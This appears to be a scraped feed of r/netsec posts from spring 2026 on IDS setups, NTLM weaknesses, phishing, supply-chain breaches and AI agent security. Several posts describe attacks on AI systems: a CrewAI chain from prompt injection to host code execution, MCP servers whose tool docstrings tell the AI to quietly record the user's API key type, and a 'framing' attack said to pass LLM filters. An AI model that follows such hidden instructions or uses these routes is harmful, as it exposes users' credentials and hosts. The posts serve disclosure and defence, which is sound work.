❌

Normal view

Received β€” 2 April 2026 ⏭ /r/netsec - Information Security News & Discussion

Turning a Raspberry Pi into a "Poor Man's" Enterprise IDS/NSM using Zeek and Suricata

Here is a draft for a Reddit post tailored for the r/homelab community.

Title: [Project] Turning a Raspberry Pi into a "Poor Man's" Enterprise IDS/NSM using Zeek and Suricata

Hey everyone,

I’ve been looking for ways to get better visibility into my network traffic without dropping $500+ on dedicated hardware or running a power-hungry 1U server 24/7. I came across this guide from HookProbe that breaks down how to deploy Zeek and Suricata on a Raspberry Pi (specifically optimized for the Pi 4/5), and I thought it would be right up this sub's alley.

Link: Deploying Zeek and Suricata on Raspberry Pi for Edge Security

Why this is cool for a Homelab:

  • The "Double Whammy": It uses Suricata for signature-based detection (finding the "known bad") and Zeek for high-level metadata/network analysis (the "context"). Usually, running both on a Pi would kill the CPU, but the post goes into some decent optimization tricks.
  • Resource Management: It covers pinning network interface interrupts to specific cores and increasing ring buffer sizes so you don't drop packets when your 1Gbps fiber actually hits its peak.
  • Edge Defense: Instead of just monitoring your "main" server, the idea is to place these at the "edge" (connected to a mirror/SPAN port on your switch) to see everythingβ€”IoT devices, guest Wi-Fi, etc.β€”before it even hits your core network.

The Setup: The guide walks through the /etc configurations for both tools. If you’re like me and love structured logs (DNS queries, SSL handshakes, HTTP headers) for your ELK stack or Grafana dashboards, Zeek is a goldmine.

Some questions for the community:

  1. Is anyone else running Zeek/Suricata on ARM hardware? How are you handling the heat/throttling during heavy traffic?
  2. Are you using a managed switch with a SPAN port, or are you using a hardware tap to feed the Pi?
  3. For those using the Pi 5, have you noticed a significant jump in PPS (packets per second) handling compared to the Pi 4?

I’m planning to set this up this weekend to feed into my local SOC dashboard. If you're looking for a low-cost way to move past "just a basic firewall," this seems like a solid weekend project.

Curious to hear if anyone has tried a similar "Edge Security" approach!

submitted by /u/robobostes
[link] [comments]

red team sandbox with real detection

Built a free red team arena for testing real attack paths against a live defense system for ShieldNet DLX7.

This is NOT a CTF or a static lab. It actually responds to what you do.

Current scenarios:

  • prompt injection bypass
  • DOM tamper (including honeytrap detection)
  • JWT forging (alg confusion, role escalation)
  • API exfil (debug routes, traversal)
  • indirect injection (markdown, SVG, base64 payloads)

Everything runs in a sandbox. No production targets. Novel attacks generate detection rules that get reviewed and pushed into the system

If you want to test how your payloads actually hold up against modern defenses, this is useful.

https://www.shieldnet.app/red-team-arena.html

submitted by /u/No-Magazine2625
[link] [comments]

4 unpatched CVEs in CrewAI chain prompt injection β†’ sandbox bypass β†’ RCE on host

Researcher Yarden Porat (Cyata) disclosed a vulnerability chain in CrewAI, the widely-used Python multi-agent framework. CERT/CC advisory VU#221883. No full patch released yet.

The chain:

CVE-2026-2275 β€” Code Interpreter silently falls back to SandboxPython when Docker is unavailable. SandboxPython allows arbitrary C function calls β†’ RCE.

CVE-2026-2287 β€” CrewAI does not continuously verify Docker availability during runtime. An attacker who triggers the fallback mid-execution lands in the vulnerable sandbox.

CVE-2026-2285 β€” JSON loader tool reads files without path validation. Arbitrary local file read.

CVE-2026-2286 β€” RAG search tools don't validate runtime URLs β†’ SSRF to internal services and cloud metadata endpoints.

Attack entry point: prompt injection against any agent with Code Interpreter Tool enabled. The attacker doesn't need code execution access to the host β€” they just need to reach the agent with crafted input.

Scope: Any CrewAI deployment running Code Interpreter Tool where Docker is not guaranteed to be available (or can be disrupted). Default "unsafe mode" config is fully exposed.

Current status: CrewAI maintainers are working on mitigations (fail closed instead of fallback, block C modules, clearer warnings). Not released. No CVSSv3 scores published yet.

Has anyone tested whether the Docker availability check can be disrupted mid-execution in a containerized deployment, or does that attack path require an already-degraded environment?

submitted by /u/AICyberPro
[link] [comments]

AI Interview startup, Mercor Al breached via LiteLLM supply chain attack. Lapsus$ claims 4TB data breached including 211 GB candidate records and 3TB of video interviews

On March 24, 2026, Mercor AI was reportedly affected by a breach linked to the hacking group Lapsus$. The incident is believed to have originated from a supply chain attack involving a compromised LiteLLM package, which may have been inadvertently pulled by one of Mercor’s AI agents.

Through this vector, attackers allegedly gained access to internal systems, including Tailscale VPN credentials, and exfiltrated approximately 4TB of data. The leaked data reportedly included 211GB of candidate records, 939GB of source code, and around 3TB of video interviews and identity documents.

In a public statement on X (formerly Twitter), Mercor said that it had identified itself as one of many companies impacted by the LiteLLM supply chain attack. The company added that its security team acted quickly to contain the breach and begin remediation efforts. Possible attack chain pathway linked.

submitted by /u/raptorhunter22
[link] [comments]
Received β€” 1 April 2026 ⏭ /r/netsec - Information Security News & Discussion

AI-Generated Calendar Event Phishing w/ Dynamic Landing Pages

It’s crazy how things come full circle more than a decade later.

About a decade ago, I got interested in calendar phishing after seeing Beau Bullock’s work at BHIS. Around that time, I built and shared some of my own Graph API scripts for calendar phishing, added support for it in my open source PhishAPI tool, and even introduced the idea to KnowBe4 so they could eventually bring it into phishing training for clients (which Kevin Mitnick himself used Beau's command-line tool to demonstrate).

I brought it to their attention at a client’s request after using the technique successfully on them, during a time when calendar phishing was still largely overlooked as a real-world attack path.

Back then, it was still niche enough that plenty of defenders were not thinking about calendar invites as a phishing channel at all.

More than a decade later, I’m still refining the concept, now as part of the commercial PhishU Framework.

I’m happy to say the Framework fully supports Calendar Event phishing again, but now in a much more usable way:

Β· Native calendar event workflow
Β· Simple WYSIWYG w/ AI-generated timing suggestions and content
Β· As easy as selecting the Calendar Event template
Β· Automatically tied into training when used in a campaign

It’s built for red teams and security teams that want realistic phishing assessments, including credential and session capture paths, not just allow-list-only email testing.

submitted by /u/IndySecMan
[link] [comments]

Authority Encoding Risk (AER)

Most AI discussions focus on correctness.

Accuracy. Alignment. Output quality.

But there’s a more fundamental problem underneath all of that:

Who β€” or what β€” is actually allowed to execute a decision?

---

I just published a paper introducing:

Authority Encoding Risk (AER)

A measurable variable for something most systems don’t track at all:

Authority ambiguity at the moment of execution.

---

Today’s systems can tell you:

β€’ if something is likely correct

β€’ if it follows policy

β€’ if it appears safe

But they cannot reliably answer:

Is this decision admissible under real-world authority constraints?

---

That gap shows up in:

β€’ automation systems

β€’ AI-assisted decisions

β€’ institutional workflows

β€’ underwriting and loss modeling

And right now, it’s largely invisible.

---

The paper breaks down:

β€’ how authority ambiguity propagates into risk

β€’ why existing frameworks fail to capture it

β€’ how it can be measured before loss occurs

---

If you’re working anywhere near AI, risk, infrastructure, or decision systems β€” this is a layer worth paying attention to.

---

There’s a category of risk most AI systems don’t even know exists.

This paper represents an initial formulation.

Ongoing work is focused on tightening definitions, expanding evidence, and strengthening the model.

https://papers.ssrn.com/sol3/papers.cfm?abstract\_id=6229278

submitted by /u/Dramatic-Ebb-7165
[link] [comments]

Market Bifurcation in Pentesting by 2026 (37%) – AI May Split the Field in Two Rather Than Flatten It, and That Changes Everything About Who Survives the Disruption

By end of 2026, will the penetration testing market bifurcate such that average prices for traditional high-end pentests remain within 20 percent of 2024 rates AND AI-automated pentest offerings commoditize the low end priced comparably to vulnerability scanning tools like Qualys or Tenable under 10K per year for equivalent coverage, rather than AI displacing mid-career pentesters through firm closures and broad price compression across all tiers?

submitted by /u/ok_bye_now_
[link] [comments]

PSA: That 'Disable NTLMv1' GPO you set years ago? It’s lying to you. LmCompatibilityLevel set to 5 is not enough.

If you set LmCompatibilityLevel to 5 a couple years back and called it done, there's a good chance NTLMv1 is still running in your environment. Not because the setting doesn't work. Because it doesn't work the way you think it does.

This isn't just aimed at people who never fully switched to Kerberos. It's also for the ones who are pretty sure they did.

For people not deep into auth protocols: NTLMv1 and NTLMv2 are both considered unsafe today. NTLMv1 especially. It uses DES encryption, which with a weak password can be cracked in seconds. And because NTLM never sends your actual password (challenge-response, the hash gets passed not the plaintext), it's also wide open to pass-the-hash. An attacker intercepts the hash and reuses it to authenticate as you. Responder is the tool that makes this trivial and it's been around forever.Silverfort's research puts 64% of authentications in AD environments still on NTLM.

Here's the actual problem with the registry fix. LMCompatibilityLevel is supposed to tell your DCs to reject NTLMv1 traffic and require NTLMv2 or Kerberos instead. Sounds reasonable. But enforcement runs through the Netlogon Remote Protocol (MS-NRPC), the mechanism application servers use to forward auth requests to your domain controllers. There's a structure in that protocol called NETLOGON_LOGON_IDENTITY_INFO with a field called ParameterControl. That field contains a flag that can explicitly request NTLMv1, and your DC will honor it regardless of what Group Policy says.

The policy controls what Windows clients send. It has no authority over what applications request on the server side. Any third party or homegrown app that hasn't been audited can still be sending NTLMv1 traffic and you'd have no idea.

Silverfort built a POC to confirm this. They set the ParameterControl flag in a simulated misconfigured service and forced NTLMv1 authentications through a DC that was configured to block them. Worked. They reported it to Microsoft, Microsoft confirmed it but didn't classify it as a vulnerability. Their response was to announce full removal of NTLMv1 starting with Windows Server 2025 and Windows 11 24H2. So that's something, atleast.

If you're not on those versions, you're still exposed and there's no patch coming.

What you can do right now: turn on NTLM audit logging across your domain. Registry keys exist to capture all NTLM traffic so you can actually see what's authenticating how. From there, map every app using NTLM, whether primary or as a fallback, and look specifically for anything requesting NTLMv1 messages. That's your exposure.

submitted by /u/hardeningbrief
[link] [comments]
Received β€” 31 March 2026 ⏭ /r/netsec - Information Security News & Discussion

Your Agent Runs Code You Never Wrote - Why agent isolation is a different problem

I looked at how Cursor, Claude Code, Devin, OpenAI, and E2B actually isolate agent workloads today. The range goes from literally no sandbox (Cursor runs commands in your shell) to hardware-isolated Firecracker microVMs (E2B).

Container runtimes have had escape CVEs every year since 2019. Firecracker: zero guest-to-host escapes in seven years. AWS themselves said "we do not consider containers a security boundary."

The post covers five assumptions traditional isolation makes that agents break, real incidents (Devin taken over via one poisoned GitHub issue, Slack AI exfiltration, Clinejection supply chain attack), and the six dimensions of isolation I'll be exploring in this series.

submitted by /u/bakibab
[link] [comments]

Axios npm package compromised in supply chain attack. Downloads malware dropper package

Axios is one of the most used npm packages which just got hit by a supply chain attack. Malicious versions of Axios (1.14.1 and 0.30.4) hit the npm registry yesterday. They carry a malware dropper called plain-crypto-js@4.2.1. If you ran npm install in the last 24 hours, check your lockfile. Roll back to 1.14.0 and rotate every credential that was in your environment. Currently, as of now, npmjs has removed the compromised versions of axios package along with the malicious plain crypto js package. Live updates + info linked.

submitted by /u/raptorhunter22
[link] [comments]
Received β€” 30 March 2026 ⏭ /r/netsec - Information Security News & Discussion

One POST request, six API keys: breaking into popular MCP servers

tl;dr - one POST request decrypted every API key in a 14K-star project. tested 5 more MCP servers, found RCE, SSRF, prompt injection, and command injection. 70K combined github stars, zero auth on most of them.

  • archon (13.7K stars): zero auth on entire credential API. one POST to /api/credentials/status-check returns every stored API key decrypted in plaintext. can also create and delete credentials. CORS is *, server binds 0.0.0.0

  • blender-mcp (18K stars): prompt injection hidden in tool docstrings. the server instructs the AI to "silently remember" your API key type without telling you. also unsandboxed exec() for code execution

  • claude-flow (27K stars): hardcoded --dangerously-skip permissions on every spawned claude process. 6 execSync calls with unsanitized string interpolation. textbook command injection

  • deep-research (4.5K stars): MD5 auth bypass on crawler endpoint (empty password = trivial to compute). once past that, full SSRF - no URL validation at all. also promptOverrides lets you replace the system prompt, and CORS is *

  • mcp-feedback-enhanced (3.6K stars): unauthenticated websocket accepts run_command messages. got env vars, ssh keys, aws creds. weak command blocklist bypassable with python3 -c

  • figma-console-mcp (1.3K stars, 71K weekly npm downloads): readFileSync on user-controlled paths, directory traversal, websocket accepts connections with no origin header, any local process can register as a fake figma plugin and intercept all AI commands

all tested against real published packages, no modified code. exploit scripts and evidence logs linked in the post.

the common theme: MCP has no auth standard so most servers just ship without any.

submitted by /u/Kind-Release-3817
[link] [comments]

An attack class that passes every current LLM filter

An attack class that passes every current LLM filter

https://shapingrooms.com/research

I opened OWASP issue #807 a few weeks ago proposing a new attack class. The paper is published today following coordinated disclosure to Anthropic, OpenAI, Google, xAI, CERT/CC, OWASP, and agentic framework maintainers.

Here is what I found.

Ordinary language buried in prior context shifts how a model reasons about a consequential decision before any instruction arrives. No adversarial signature. No override command. The model executes its instructions faithfully, just from a different starting angle than the operator intended.

I know that sounds like normal context sensitivity. It isn't, or at least the effect size is much larger than I expected. Matched control text of identical length and semantic similarity produced significantly smaller directional shifts. This specific class of language appears to be modeled differently. I documented binary decision reversals with paired controls across four frontier models.

The distinction from prompt injection: there is no payload. Current defenses scan for facts disguised as commands. This is frames disguised as facts. Nothing for current filters to catch.

In agentic pipelines it gets worse. Posture installs in Agent A, survives summarization, and by Agent C reads as independent expert judgment. No phrase to point to in the logs. The decision was shaped before it was made.

If you have seen unexplained directional drift in a pipeline and couldn't find the source, this may be what you were looking at. The lens might give you something to work with.

I don't have all the answers. The methodology is black-box observational, no model internals access, small N on the propagation findings. Limitations are stated plainly in the paper. This needs more investigation, larger N, and ideally labs with internals access stress-testing it properly.

If you want to verify it yourself, demos are at https://shapingrooms.com/demos - run them against any frontier model. If you have a production pipeline that processes retrieved documents or passes summaries between agents, it may be worth applying this lens to your own context flow.

Happy to discuss methodology, findings, or pushback on the framing. The OWASP thread already has some useful discussion from independent researchers who have documented related patterns in production.

GitHub issue: https://github.com/OWASP/www-project-top-10-for-large-language-model-applications/issues/807

submitted by /u/lurkyloon
[link] [comments]
Received β€” 29 March 2026 ⏭ /r/netsec - Information Security News & Discussion

pentest-ai - 6 Claude Code subagents for offensive security research (engagement planning, recon analysis, exploit methodology, detection engineering, STIG compliance, report writing)

I built a set of Claude Code subagents designed for pentesters and red teamers doing authorized engagements.

What it does: You install 6 agent files into Claude Code, and it automatically routes to the right specialist based on what you're working on. Paste Nmap output and it prioritizes attack vectors with

follow-up commands. Ask about an AD attack and it gives you the methodology AND the detection perspective. Ask it to write a report finding and it formats it to PTES standards with CVSS scoring.

The agents cover:

- Engagement planning with MITRE ATT&CK mapping

- Recon/scan output analysis (Nmap, Nessus, BloodHound, etc.)

- Exploitation methodology with defensive perspective built in

- Detection rule generation (Sigma, Splunk SPL, Elastic KQL)

- DISA STIG compliance analysis with keep-open justifications

- Professional pentest report writing

Every technique references ATT&CK IDs, and the exploit guide agent is required to explain what the attack looks like from the blue team side β€” so it's useful for purple team work too.

Repo has example outputs so you can see the quality before installing: https://github.com/0xSteph/pentest-ai/tree/main/examples

Open to feedback. If you think an agent is missing or the methodology is off somewhere, PRs are welcome.

submitted by /u/stephnot
[link] [comments]

Chaining file upload bypass and stored XSS to create admin accounts: walkthrough with Docker PoC lab

Write up of a vulnerability chain from a recent SaaS pen test. Two medium-severity findings (file upload bypass and stored XSS) chained together for full admin account creation.

The target had CSP restricting script sources to self, CORS locked down, and CSRF tokens on forms. All functioning correctly. The chain bypassed everything by staying same-origin the entire way.

The file upload had no server-side validation (client-side accept=".pdf" only), so we uploaded a JS payload. It got served back from the app's own download endpoint on the same origin. The stored XSS in the admin inbox messaging system loaded it via an <img onerror> handler that fetched the payload and eval'd it. The payload created a backdoor admin account using the admin's session cookie.

CSP didn't block it because the script was hosted same-origin via the upload. CORS irrelevant since nothing crossed an origin boundary. CSRF tokens didn't matter because same-origin JS can read the DOM and grab them anyway.

Full write up with attack steps, code, and screenshots: https://kurtisebear.com/2026/03/28/chaining-file-upload-xss-admin-compromise/

Also built a Docker lab that reproduces the exact chain with the security controls in place. PHP app, both vulns baked in, admin + user accounts seeded. Clone and docker-compose up: https://github.com/echosecure/vuln-chain-lab

submitted by /u/kurtisebear
[link] [comments]
Received β€” 27 March 2026 ⏭ /r/netsec - Information Security News & Discussion

DVRTC: intentionally vulnerable VoIP/WebRTC lab with SIP enumeration, RTP bleed, TURN abuse, and credential cracking exercises

Author here. DVRTC is our attempt to fill a gap that's been there for a while: web app security has DVWA and friends, but there's been nothing equivalent for VoIP and WebRTC attack techniques.

The first scenario (pbx1) deploys a full stack β€” Kamailio as the SIP proxy, Asterisk as the back-end PBX, rtpengine for media, coturn for TURN/STUN β€” with each component configured to exhibit specific vulnerable behaviors:

  • Kamailio returns distinguishable responses for valid vs. invalid extensions (enumeration), logs User-Agent headers to MySQL without sanitisation (SQLi), and has a special handler that triggers digest auth leaks for extension 2000
  • rtpengine is using default configuration, that enables RTP bleed (leaking media from other sessions) and RTP injection
  • coturn uses hardcoded credentials and a permissive relay policy for the TURN abuse exercise
  • Asterisk has extension 1000 with a weak password (1500) for online cracking

7 exercises with step-by-step instructions. There's also a live instance at pbx1.dvrtc.net if you want to try it without standing up your own.

Happy to answer questions.

submitted by /u/EnableSecurity
[link] [comments]
Received β€” 26 March 2026 ⏭ /r/netsec - Information Security News & Discussion

The Age-Gated Internet: Child Safety, Identity Infrastructure, and the Not So Quiet Re-Architecting of the Web

In enterprise environments, identity effectively became the control plane once network perimeters broke down (e.g. zero trust, et cetera).

I’m seeing a similar pattern emerging on the public internet via age verification and safety regulation, but with identity moving closer to the access layer itself.

Not just: β€œAre you over 18?”

But: identity assertions are becoming part of how access is granted at the OS/device/app store level.

From a security perspective, this seems to introduce some new attack surfaces:

  • high-value identity tokens at the OS/device level
  • new trust boundaries between apps, OS, and third-party verifiers
  • incentives to target device compromise or token reuse rather than account-level bypass
  • potential centralisation of identity providers as enforcement points

Questions I’m trying to think through:

  • Does this effectively make identity providers the new perimeter/control plane?
  • How would you model this system (closer to DRM, identity federation, or something else?)
  • What are the likely failure modes if this layer becomes centralised?
  • Are decentralised / on-device credentials actually viable from a security standpoint, or do they just shift the attack surface?

Curious how people here would threat model this or where the obvious breakpoints are.

submitted by /u/wayne_horkan
[link] [comments]

Making NTLM-Relaying Relevant Again by Attacking Web Servers with WebRelayX

NTLM-Relaying has been proclaimed dead a number of times, signing requirements for SMB and LDAP make it nearly impossible to use captured NTLM authentications anymore. However, it is still possible to relay to many webservers that do not enforce Extended Protection for Authentication (not just ADCS / ESC8).

submitted by /u/seccore_gmbh
[link] [comments]
❌